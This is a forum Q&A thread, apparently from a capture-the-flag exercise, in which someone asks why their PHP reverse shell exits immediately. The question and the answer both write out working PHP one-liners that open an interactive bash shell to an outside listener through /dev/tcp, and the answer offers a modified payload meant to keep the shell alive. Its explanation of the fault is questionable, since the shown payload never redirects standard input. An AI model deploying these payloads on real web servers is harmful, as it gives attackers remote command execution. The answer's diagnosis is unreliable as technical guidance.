# Reverse PHP shell exit when netcat listening

Tags: unix, reverse-shell, netcat

My reverse shell is exiting when i lsten it with netcat: here is netcat output:

```
listening on [any] 5555 ...
connect to [10.9.3.117] from (UNKNOWN) [10.10.47.117] 37602
bash: cannot set terminal process group (873): Inappropriate ioctl for device
bash: no job control in this shell
www-data@rootme:/var/www/html/uploads$ exit
```

here is my php reverse shell:

```
<?php system("bash -c 'bash -i >& /dev/tcp/10.9.3.157/5555>&1'"); ?>
```

Any help?

Comment: Have you looked up those error messages?

Answer (score 1):

The issue is once the command `bash -c 'bash -i >& /dev/tcp/10.9.3.157/5555>&1'` is executed the `system` function will exit which lead to  kill the created bash process and the reverse shell. To solve this, you need to add a command that will keep the process created by `system` running/alive. You can try:

```
<?php system("bash -i >& /dev/tcp/10.9.3.157/5555>&1; cat -"); ?>
```

The `cat -` command will permanently wait for `STDIN` and print it to `STDOUT` until it process or it parent process are killed. This will block the exit of the process created by `system` function as long as the `cat -` process is running.